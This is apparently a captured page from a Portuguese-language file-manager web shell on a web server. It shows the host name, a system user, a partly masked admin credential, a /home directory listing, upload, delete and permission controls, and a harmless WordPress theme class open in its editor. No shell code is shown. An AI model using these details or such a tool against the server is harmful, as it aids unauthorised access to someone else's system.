🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_dea02fca / 7f2a****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: Type.php
<?php abstract class ET_Core_Post_Type extends ET_Core_Post_Object { /** * The `$args` array used when registering this post type. * * @since 3.0.99 * @var array */ protected $_args; /** * The name of the primary category-style taxonomy for this post type. * * @since 3.0.99 * @var string */ protected $_category_tax = ''; /** * The name of the primary tag-style taxonomy for this post type. * * @since 3.0.99 * @var string */ protected $_tag_tax = ''; /** * The WP Post Type object for this instance. * * @since 3.0.99 * @var WP_Post_Type */ protected $_wp_object; /** * Post type key. * * @since 3.0.99 * @var string */ public $name; /** * @inheritDoc */ public $wp_type = 'cpt'; /** * @return ET_Core_Post_Query */ public function query() { return new ET_Core_Post_Query( $this->name, $this->_category_tax, $this->_tag_tax ); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar